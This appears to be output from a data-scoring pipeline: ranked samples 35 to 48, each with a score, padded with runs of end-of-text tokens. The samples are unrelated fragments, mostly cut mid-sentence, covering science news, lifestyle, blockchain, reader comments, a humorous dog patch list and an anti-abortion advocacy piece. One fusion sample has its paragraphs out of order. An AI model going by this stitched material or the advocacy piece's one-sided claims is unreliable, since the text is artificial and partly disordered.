Wikipedia<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 35; Score = 1015808.0 +<|begin_of_text|>Ben Mills + +Researchers dream of making miniature, flexible electronic circuits from films just a few atoms thick. But growing such 2D films at the scale needed to produce batches of reliable electronic devices has been a challenge. + +Nature podcast Reporter Lizzie Gibney finds a class of materials with exotic properties – but can they one day rival silicon? You may need a more recent browser or to install the latest version of the Adobe Flash Plugin. + +Now materials scientists have devised a way to grow single layers of a promising class of 2D semiconductor on silicon wafers that are 10 centimetres across — all the while maintaining the impressive electronic properties seen in smaller samples1. They used the films to make hundreds of transistors, which tests showed worked in 99% of cases. + +“Lots of people are trying to grow single layers on this large scale, myself among them,” says Georg Duesberg, a materials scientist at Trinity College Dublin. “But it looks like these guys have really done it.” + +The semiconductors in question are known as transition-metal dichalcogenides (TMDs). A single-layer TMD is three atoms thick: it comprises a sheet of atoms from a family of elements called transition metals (which include molybdenum and tungsten) sandwiched between two layers of chalcogen atoms (such as sulfur, selenium and tellurium). + +Like their carbon-based cousin graphene, TMD sheets are strong, thin and flexible and conduct electrons. But unlike graphene, they are also semiconductors — meaning that the flow of electrons can be easily switched off and on. TMDs are unlikely ever to replace the most famous semiconductor, silicon, whose manufacture has been honed over decades. But they could form films more than a thousand times thinner than today's components made from silicon slabs, allowing for flexible transistors, displays, and light detectors. + +Large layers + +TMD layers can be peeled from a multi-layered crystal, much as graphene can be pulled from graphite with sticky tape. But the results can be inconsistent and the process is time consuming. An alternative — growing the material atom by atom from a gas of precursor chemicals — has so far produced only small-area samples that are often more than one layer thick. + +Publishing in Nature1 on 29 April, Jiwoong Park at Cornell University in Ithaca, New York, and his colleagues have adapted this technique to grow large single-layer films. Over 26 hours and at a temperature of 550 °C, +================================================================================ +Rank = 36; Score = 1007616.0 +<|begin_of_text|>Thanks to data collected by ESA’s Cluster spacecraft and a NASA mission called the Imager for Magnetopause-to-Aurora Global Exploration (IMAGE), scientists have solved a long-standing space mystery – the origin of a colorful display in the night sky known as the theta aurora. + +Auroras are the most visible manifestation of the Sun’s effect on Earth. + +They are caused by the solar wind, a stream of plasma – electrically charged atomic particles – carrying its own magnetic field, interacting with the magnetic field of our planet. + +Normally, the main region for this impressive display is the ‘auroral oval’, which lies at around 65-70 degrees north or south of the equator, encircling the polar caps. + +However, auroras can occur at even higher latitudes. One type is known as a theta aurora because seen from above it looks like the Greek letter Θ (theta) – an oval with a line crossing through the center. + +While the genesis of the auroral oval emissions is reasonably well understood, the origin of the theta aurora was unclear until now. + +The new study, published in the journal Science, shows that hot plasma funneled into near-Earth space from the Sun helps cause these unique aurora. + +“Previously it was unclear whether this hot plasma was a result of direct solar wind entry through the lobes of the magnetosphere, or if the plasma is somehow related to the plasma sheet on the night side of Earth,” said study lead author Dr Robert Fear of the University of Southampton. + +“The possibilities have been debated since the first satellite observations of the phenomenon were made in the 1980s.” + +The mystery was finally solved by studying data collected simultaneously by the IMAGE satellite and Cluster’s PEACE electron spectrometer instruments on September 15, 2005. + +While the four Cluster satellites were located in the southern hemisphere magnetic lobe, IMAGE had a wide-field view of the southern hemisphere aurora. + +As one Cluster satellite observed uncharacteristically energetic plasma in the lobe, IMAGE saw the ‘arc’ of the theta aurora cross the magnetic footprint of Cluster. + +“We found that the energetic plasma signatures occur on high-latitude magnetic field lines that have been closed by the process of magnetic reconnection, which then causes the plasma to become relatively hot,” Dr Fear explained. + +“Because the field lines are closed, the observations are incompatible with direct entry from the solar wind.” + +“By testing this and other predictions about the behavior of the theta aurora, our observations provide strong evidence that the plasma trapping mechanism is responsible for +================================================================================ +Rank = 37; Score = 983040.0 +<|begin_of_text|>But today it’s assumed that only the lean, muscular, hairless and ab-defined will feel comfortable in a bikini. “It’s become difficult to feel natural with a normal body,” Ms. Kennedy said. “Fatism has taken over. It’s O.K. to be mean to lumpy, lardy people. It’s a sort of subtle intolerance towards people that’s very bad.” + +Thanks to the ubiquity of cameras, wearing a bikini is now scary even for gorgeous celebrities. Remember how Jennifer Love Hewitt was pilloried in 2007 for the crime of wearing a bandeau without being a size 0? Helen Mirren was accused of having had surgery when she dared to flaunt her (taut, toned) 62-year-old stomach in a tomato-red bikini a year later. + +“It’s about everyone everywhere having a comment, and they are anonymous,” said Gabrielle Reece, the former volleyball star and now a fitness guru, who has also been captured bare-stomached by the paparazzi. “The bathing suit is really a metaphor for all the ways we can approach a lot of things,” she said. “Why would we punish ourselves when we don’t have to? Why dread that?” + +Photo + +But the bikini has become the star of several fear-inspiring marketing campaigns. A recent advertisement for Yoplait Light features an itsy-bitsy yellow-and-red polka dotted bikini hanging on a wall as a future award for the diligent yogurt eater. + +Nivea has a Goodbye Cellulite, Hello Bikini! Challenge, which prods women to slim down and buy its products. Nivea also sponsors the Cosmopolitan Magazine Bikini Bash, which last year involved 100 lithe dancers in blue-and-white ruffled bikinis tossing their hair violently to the Midi Mafia’s song “Two-Piece” in front of 1,000 attendees at the Planet Hollywood resort in Las Vegas. The two male singers of “Two-Piece,” fully clothed, belted, “You all look like models off the cover of Cosmo.” + +Amansala, a “bikini boot camp,” in Ibiza, Spain, and Tulum, Mexico, sells six-night stays starting at $1,875. “Our society definitely has a stigma of bikini readiness — my business thrives on that,” said Melissa Perlman, an owner of the resort, which she said mostly attracts women in their 30s and 40s. “But at the same time, we +================================================================================ +Rank = 38; Score = 978944.0 +<|begin_of_text|>The electronic currency Bitcoin works because of encryption and a blockchain -- a widely accessible, distributed record of everyone who has created, accessed or altered a given file. Bitcoin's blockchain tracks who has had each Bitcoin, verifies its authenticity, and so on. + +This technology, however, has much broader applications. As governments move to release more data and documents online, verifying the authenticity of those files will become increasingly important. In the future, governments could use blockchains to track and verify the ownership of property records, banking records, securities or anything else posted on an open data platform. + +Brian Forde, the director of the MIT Media Lab's Digital Currency Initiative, explores the concept in the video below. + +By 2020, using blockchain technology might even become a best practice for the verification of public records online. + +Makes sense, @digiphile. You could be right. — Jessica Rosenworcel (@JRosenworcel) August 31, 2015 + +"Property records, particularly in the developing world, are notoriously subject to hacking," Oliver Goodenough, a professor at Vermont Law School, observed in an interview. "Honduras got money to do an electronic record land registry, but when they were done, many key properties were held by relatives of people who set up the ledger. Now, a contract was awarded to a company in Texas to set up a blockchain-based property system." + +That example and others are drawing attention in other contexts, from countries around the world. In the United States, the blockchain might be a way of validating voter records before and after elections, making entries perusable and insulating them from fraud. It might also be relevant to securities, adding a technological component that would make fraud by corrupt officials much harder. + +Given how blockchain technology has matured in recent years, Goodenough says it's just going to require hard work to get it into use -- and he hopes that Vermont will be a leader in that area. + +"This could give sunshine and make it very hard to screw the system," he told me. "The blockchain will not cook us breakfast, but it might tell us who cooked breakfast." + +For more, watch Goodenough's talk earlier this year at Stanford (embedded below) on the state of legal technology: + +Governments haven't been the biggest fans of Bitcoin, given the use of the cryptocurrency on the shadier parts of the Internet, including drug deals on the Deep Web. But at least one recognizes the potential of blockchains. + +This summer, Vermont took a couple of step toward smart contracts, +================================================================================ +Rank = 39; Score = 966656.0 +<|begin_of_text|>Fresh Christmas trees are a holiday tradition, loved for their beauty and fresh, outdoorsy fragrance. However, Christmas trees often take the blame for destructive fires that occur during the holiday season. The most effective way to prevent Christmas tree fires is to keep the tree well hydrated. With proper care, a tree should remain fresh for two to three weeks. This may sound easy, but it becomes a problem if your Christmas tree is not drinking water. + +Causes for a Christmas Tree Not Taking Up Water + +Generally, when Christmas trees have problems taking up water, it’s because we tend to add products to the tree itself or the water. Avoid spray-on fire retardants and other products advertised to keep your tree fresh. Similarly, bleach, vodka, aspirin, sugar, lime soda, copper pennies or vodka have little or no effect and some can actually slow water retention and increase moisture loss. + +What works best? Plain old tap water. If you tend to be forgetful, keep a pitcher or watering can near the tree to remind you. + +How to Get a Christmas Tree to Take Up Water + +Cutting a thin sliver from the bottom of the trunk is key to keeping a tree fresh. Keep in mind that if the tree is freshly cut, you don’t need to cut the trunk. However, if the tree has been cut for longer than 12 hours before you put it in water, you must trim ¼ to ½ inch from the bottom of the trunk. + +This is because the bottom of the trunk seals itself with sap after a few hours and can’t absorb water. Cut straight across and not at an angle; an angular cut makes it harder for the tree to take up water. It is also difficult to get a tree with an angular cut to stand upright. Also, don’t drill a hole in the trunk. It doesn’t help. + +Next, a large stand is critical; a Christmas tree can drink up to one quart of water for each inch of stem diameter. The National Christmas Tree Association recommends a stand with a one-gallon capacity. Never trim the bark to accommodate a too-tight stand. The bark helps the tree take up water. + +Christmas Tree Watering Tips + +Start with a fresh Christmas tree. There’s no way to hydrate a dried up tree, even if you trim the bottom. If you aren’t sure about freshness, pull a branch slowly through your fingers. A few dry needles are no reason for concern, but look for a fresher tree if a large number of needles are loose or brittle. + + +================================================================================ +Rank = 40; Score = 966656.0 +<|begin_of_text|>During the holiday season, many people place toy trains on circular tracks beneath their Christmas trees. + +This month, at the Princeton Plasma Physics Laboratory, physicists and engineers built tracks inside one of its fusion reactors and ran a toy train on them for three days. + +It was not an exercise in silliness, but in calibration. + +The modified model of a diesel train engine was carrying a small chunk of californium-252, a radioactive element that spews neutrons as it falls apart. + +Photo + +“We needed to refine the calibration technique to make sure we are measuring our neutrons as accurately as possible,” said Masa Ono, the project head of the National Spherical Torus Experiment. + +Advertisement Continue reading the main story + +The spherical torus experiment is a small reactor designed to test new approaches to fusion, in which hydrogen atoms are fused together at ultrahigh temperatures to produce energy — as the Sun does. Fusion generates copious numbers of neutrons, which tell how well the reaction is proceeding.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 41; Score = 942080.0 +<|begin_of_text|>The dark color of the region is speculated to be the result of a "tar" made of complex hydrocarbons called tholins covering the surface, which form from methane and nitrogen in the atmosphere interacting with ultraviolet light and cosmic rays.[5][6][7] Tholins have been observed on other planetary bodies, such as Iapetus, Umbriel, and in the atmosphere of Titan, although the irregular and disconnected nature of the dark spots on Pluto has not yet been explained.[5] The presence of craters within Cthulhu indicates that it is perhaps billions of years old, in contrast to the adjacent bright, craterless Sputnik Planitia, which may be as little as 100 million years old;[8] however, some areas of Cthulhu Macula are smoother and much more modestly cratered, and may be intermediate in age. The western 'head' region consists mostly of heavily cratered 'alpine' terrain. The middle part of Cthulhu Macula is meanwhile a smooth plain, probably formed through large cryovolcanic eruptions, like Vulcan Planum on Charon. This part appears to be younger than the alpine terrain to the east, but there are nevertheless several large craters located in this region. The western 'tail' region of Cthulhu Macula was imaged in much lower resolution than the eastern part, but it can be inferred that this is a hilly landscape bordered by mountains to the west.[9][10][11] Higher-resolution images of the border between the two regions indicate that lighter material from Sputnik Planitia, composed of nitrogen, carbon monoxide, and methane ices, may be invading and overlaying the easternmost part of the dark Cthulhu Macula.[12] As of 30 July 2015, the eastern "head" region had been imaged in much higher resolution than the western "tail" region.[13] + +The "head" region of the Cthulhu feature, with Sputnik Planitia at right + +The "tail" region of Cthulhu, at the bottom of this image. The "head" extends beyond the right side of the visible portion of Pluto. Meng-P'o is visible at the extreme bottom left. + +This image shows a region at the border between Cthulhu's "head" (left) and the light, flat Sputnik Planitia (right), with Hillary Montes at center. + +The white snow caps +================================================================================ +Rank = 42; Score = 937984.0 +<|begin_of_text|>NASA/ESA/the Hubble Heritage Team (STScI/AURA) + +A photogenic and favorite target for amateur astronomers, the full beauty of nearby barred spiral galaxy M83 is unveiled in all of its glory in this Hubble Space Telescope mosaic image. The vibrant magentas and blues reveal that the galaxy is ablaze with star formation. The galaxy, also known as the Southern Pinwheel, lies 15 million light-years away in the constellation Hydra. + +The Hubble photograph captures thousands of star clusters, hundreds of thousands of individual stars, and “ghosts” of dead stars called supernova remnants. The galactic panorama unveils a tapestry of the drama of stellar birth and death spread across 50,000 light-years. + +The newest generations of stars are forming largely in clusters on the edges of the dark spiral dust lanes. These brilliant young stellar groupings, only a few million years old, produce huge amounts of ultraviolet light that is absorbed by surrounding diffuse gas clouds, causing them to glow in pinkish hydrogen light. + +Gradually, the fierce stellar winds from the youngest most massive stars blow away the gas, revealing bright blue star clusters and giving a “Swiss cheese” appearance to the spiral arms. These youngest star clusters are about 1 million to 10 million years old. The populations of stars up to 100 million years or older appear yellow or orange by comparison because the young blue stars have already burned out. + +Interstellar “bubbles” produced by nearly 300 supernovas from massive stars have been found in this Hubble image. By studying these supernova remnants, astronomers can better understand the nature of the stars that exploded and dispersed nuclear processed chemical elements back into the galaxy, contributing to the next generation of new stars. + +This image is being used to support a citizen science project titled STAR DATE: M83. The primary goal is to estimate ages for approximately 3,000 star clusters. Amateur scientists will use the presence or absence of the pink hydrogen emission, the sharpness of the individual stars, and the color of the clusters to estimate ages. Participants will measure the sizes of the star clusters and any associated emission nebulae. Finally, the citizen scientists will “explore” the image, identifying a variety of objects ranging from background galaxies to supernova remnants to foreground stars.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 43; Score = 909312.0 +<|begin_of_text|>The fuel for fusion basically comes from seawater. Every bottle of water that we drink has heavy water -- deuterium -- inside. Enough that's equivalent to a whole barrel of oil, Mauel says. + +Many people who work in fusion power look 50 to 100 years into the future, and we say 'what else can provide a sustainable clean energy source for thousands of years on a large scale,' and fusion's one of the only ways to do that, Mauel says. + +When you hear the term nuclear energy, images of Fukushima or Three Mile Island may come to mind. But harnessing nuclear power isn't limited to the reactors that we currently use, which rely on nuclear fission. Energy can also be harnessed from fusion."Nuclear fusion is the energy that powers the sun and stars," Mike Mauel, professor of applied physics at Columbia University, told CBSNews.com. "It takes hydrogen gas, heating up to millions of degrees, and brings the atoms together to release energy and make helium."Instead of splitting an atom's nucleus, like in fission, nuclear fusion is the process of bringing together two atomic nuclei to form a new nucleus. And there is no need for dangerous chemical elements like uranium or plutonium -- easing the fears of nuclear proliferation. Energy derived from fusion is appealing because very few natural resources are required to create fuel.According to the U.S. Energy Information Administration (EIA), approximately 68 percent of the country's electricity in 2011 was generated by coal, natural gas, petroleum, and oil. The next highest energy source was nuclear energy at about 20 percent. About 13 percent was contributed by renewable sources, like solar, hydropower, wind, geothermal and biomass.A United Nations panel of scientists has reportedly agreed, with near certainty, that humans have a direct influence on climate change. The organization is expected to release its findings in an upcoming annual report."It is extremely likely that human influence on climate caused more than half of the observed increase in global average surface temperature from 1951 to 2010," says a draft of the report, obtained by the New York Times. "There is high confidence that this has warmed the ocean, melted snow and ice, raised global mean sea level and changed some climate extremes in the second half of the 20th century."For the first time in recorded history, the amount of carbon dioxide in the air could rise to 400 parts per million (ppm) -- it's currently just over 390 +================================================================================ +Rank = 44; Score = 888832.0 +<|begin_of_text|>NYT Pick Keynes Florida 1 day ago In macroeconomic terms, an increase in taxes followed by an equivalent increase in spending (and that therefore does not increase the deficit) increases the GDP. It is called “the balanced budget multiplier” (you can Google it!), BBM. + +Conversely, a reduction in taxes followed by a reduction in spending reduces the GDP, and therefore increases unemployment. + +In this particular case (repeal of the ACA), the reduction in taxes benefits higher income people who have a relatively low “marginal propensity to consume” (Google it!), MPC, and negatively affects lower income people, who have a relatively higher MPC. The net effect is that a reduction in taxes and an equal reduction in spending will decrease the GDP by an amount larger than the reduction in taxes. The effect on the unemployment rate will be larger than predicted by the BBM. + +Will the repeal of the ACA be the trigger for the next recession/depression? + +How long will it take for the country to be plunged into a depression? (a) two years (b) four years (c) eight years. + +It will depend on how large are the tax and spending cuts. + +GWB managed to do it in eight years, but he started with a stronger economy and made no significant spending cuts. Flag + +Flag 931 Recommend + +Recommend Share this comment on Facebook Share this comment on Twitter + +NYT Pick PeterS Boston, MA 1 day ago Mr. Krugman is right that Mr. Obama has left the country in near top shape for Mr. Trump and it is unlikely that expansion will last forever. Incidentally, things getting worse may not even be Mr. Trump's doing. While we liberals are not cheering for the success of most Trump's policies, all conscientious citizens should be extra vigilant when economic turns bad and lives get tough. History has repeatedly told us that tough times were the breeding group for authoritarians and fascists. Demagogues never had solutions but they had risen by channeling the anger of the people against chosen minorities. I hope that America will stay prosperous despite Trump and his regressive policies will be reversed over time. I hope that if bad economic times will come, we will choose a wise and compassionate leader next time to take us out of it. However, history should have taught us to be watchful; this election has shown that the wisdom of, we, the American people is not infallible. Flag + +Flag 768 Recommend + +Recommend Share this comment on Facebook Share this comment +================================================================================ +Rank = 45; Score = 880640.0 +<|begin_of_text|>Image copyright Angélica Gonzalez Image caption The plants, pictured here by co-worker Angélica Gonzalez, underpin a whole ecosystem + +It is hard to imagine you could reconstruct a record of fog dating back thousands of years, but this is exactly what Chilean scientists have done. + +The low-lying cloud is seemingly so transient and intangible, and unlike rivers and glaciers it leaves no easy-to-read impressions on the landscape. + +And yet, a Santiago team has been able to trace the fog history of the Atacama Desert by studying Tillandsia plants. + +Their chemistry suggests strongly that this local fog has increased over time. + +It is a period covering the last 3,500 years. + +"I don't think there's any other place in the world where I've actually seen a record of fog, even spanning the last hundred years," said Claudio Latorre Hidalgo from the Catholic University of Chile. + +"What little we know about fog is from measurement instrumental data that we have, and from satellite data that only spans the last 20 years. + +"So, this is actually a unique opportunity to study the evolution of a fog ecosystem over the Late Holocene, and what are the major drivers and controls of the mechanisms that produce that fog in the long term - the very long term." + +The palaeoclimate expert was discussing his team's research here at the Fall Meeting of the American Geophysical Union - the world's largest annual gathering of Earth scientists. + +Media playback is unsupported on your device Media caption Claudio Latorre Hidalgo: "The fog is the plants’ only source of water and nutrients" + +The Atacama is famous for its super-arid conditions; there are places where it has not rained for years. + +But life can eke out an existence if it can exploit the fog that rolls in off the Pacific. Tillandsia are a perfectly adapted opportunist. + +These wiry, grey plants have no roots. They clutch weakly at sand dunes, but arrange themselves at every spatial scale to maximise their capture of the fog. + +They derive everything they need from the damp air - not simply the must-have water, but also all the chemical nutrients required to underpin their biology. + +Dr Latorre Hidalgo and colleagues have dug deep into the dunes to uncover a multi-millennia succession of Tillandsia; and they have described a pronounced trend: the younger the plants, the more of the lighter type, or isotope, of nitrogen atom that they have incorporated into their tissues. + +Image +================================================================================ +Rank = 46; Score = 880640.0 +<|begin_of_text|>-Fixed a bug that caused small dogs to start barking and never stop. + +-Small dogs are no longer supported, and will self-terminate within two months. + +-St. Bernard size increased 100%. + +-St. Bernard's cask will no longer contain brandy. Now contains one of four dipping sauces (ranch dressing, sweet and sour, honey mustard and barbecue). + +-Improved saliva production in certain breeds by as much as 300%. + +-Removed a rare glitch that would cause a dog's head to rotate 360 degrees when looking inquisitively at operator. + +-Dogs now regard vacuum cleaners as friends and will attempt to operate them. + +-Fixed a bug that caused dogs to incorrectly regard fecal matter as food. + +-Fixed an error that caused social interaction between dogs to occur on the wrong end. + +-Fixed an issue where some breeds would grow curly hair, making them appear effeminate and prissy. + +-Improved dog pathfinding, allowing them to better navigate to operators located at higher altitudes or behind complicated obstacles. + +-Dramatically reduced instances of autoerotic behavior in public. + +-Addressed a logic error that caused some dogs to hysterically chomp at bees. + +-Fixed a rare glitch where a dog would regard its own tail as an enemy. + +-Removed an exploit that would allow operators to duplicate their dogs endlessly. + +-Placing a small ball or toy in a dog's open mouth while it is yawning will no longer cause it to shut down. + +-Reduced bloodhound "droopiness" by 25%. + +-Fixed issues of dogs turning hostile when spoken to in a funny or scary voice. + +-Introduced fixes for three common benign situations that would cause a dog to become sexually aroused. + +-Fixed error of dog incompatibility with chocolate cake. Should greatly improve experience of being dog. + +-Fixed a bug that would cause floppy ears to flip over the wrong way, requiring an operator to reset them to their default position. + +-Dogs should no longer drag butts across carpeting in presence of operators. + +-Fixed rendering bug that caused deformed geometry on pug faces. + +-Investigated issue of pit bulls entering rings of screaming men, biting each other to death; confirmed cause as operator error. + +-Fixed vocalization issue in huskies which would cause them to utter "I love you" when trying to say "stop tormenting me." + +-Added a routine to flush loyalty cache of dogs upon death of operators, preventing documented issues of dogs waiting at train stations for 15 years. + +-Fixed a +================================================================================ +Rank = 47; Score = 876544.0 +<|begin_of_text|>It is the central question in the abortion debate: when does life begin? + +Science teaches without reservation that life begins at fertilization (conception). It is a scientific fact that an organism exists after fertilization that did not exist before. This new organism has its own DNA distinct from the mother and father, meaning that it is a unique person. As the embryo grows, it develops a heartbeat (22 days after fertilization), its own circulatory system, and its own organs. From fertilization, it is a new organism that is alive and will continue to grow and develop as long as nutrition is provided and its life is not ended through violence or illness. + +It is indisputably human, as it has human DNA. + +The offspring of two members of a species is always the same type of creature as the parents. No two dogs will ever conceive and give birth to a cat; no fish egg will ever produce a snake. According to all the laws of nature, the preborn baby is human. + +Scientific textbooks proclaim this fact. Keith L. Moore’s The Developing Human: Clinically Oriented Embryology (7th edition, Philadelphia, PA: Saunders, 2003) states the following: + +A zygote [fertilized egg] is the beginning of a new human being. Human development begins at fertilization, the process during which a male gamete … unites with a female gamete or oocyte … to form a single cell called a zygote. This highly specialized, totipotent cell marks the beginning of each of us as a unique individual. + +“Zygote” is a scientific term for the new life that is created when the sperm and the egg combine. “Oocyte” is another term for the egg cell, the cell released by woman’s ovary, which travels down the Fallopian tube and is fertilized by the male sperm. + +The author of this scientific textbook, Keith L. Moore, is a world-renowned embryologist. He has written a number of definitive books on embryology, and his scientific knowledge and experience are vast and beyond reproach. Few medical students can complete their careers without studying from his textbooks. + +Moore puts it even more plainly in Before We Are Born: Essentials of Embryology (7th edition, Philadelphia, PA: Saunders, 2008, p. 2): + +[The zygote], formed by the union of an oocyte and a sperm, is the beginning of a new human being. + +Here is an example from another +================================================================================ +Rank = 48; Score = 876544.0 +<|begin_of_text|>"EQUAL JUSTICE UNDER LAW"-These words, written above the main entrance to the Supreme Court Building, express the 